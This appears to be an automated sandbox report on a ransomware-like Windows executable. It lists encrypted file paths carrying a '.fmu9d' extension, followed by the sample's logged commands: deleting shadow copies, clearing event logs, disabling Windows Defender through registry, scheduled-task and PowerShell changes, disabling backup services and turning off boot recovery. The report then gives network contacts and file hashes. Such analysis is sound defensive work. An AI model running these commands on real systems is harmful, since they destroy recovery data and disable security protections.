| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\over-arrow-navigation.svg.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_yZxScI3L8XQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\it-it\ui-strings.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_O7fsKlOqOu00.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_KMS_Client_AE-ul.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_rt4lVhRbHqE0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\EmbossBitmaps\Rounded Rectangle.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\plugin.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_V3YMC68TTfg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\en-US\InkObj.dll.mui | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_83lKZbk3zcs0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\BooleanIntersect.scale-180.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\osf\progress.gif | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe
"C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_12cc1" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_12cc1" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_12cc1" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| US | 52.109.12.20:443 | | tcp |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4f1870a45bbf2b6f3bf8ffe55acdbebc |
| SHA1 | 7eb6ab5440957493a85b7bc71c4a91446f1e1575 |
| SHA256 | 33c573e776d5f986b4b8aaedf82d6191df350adc18d1950d4fe146a5e0a76726 |
| SHA512 | 6a0b1b6fe0c1f5f1a671dc59b19970825331febbca50ed611693b089277cbec0b147f4393bd0d8934fff793c936720e9aab4609c2e5f31f2a0cd0d7ca42dcfd0 |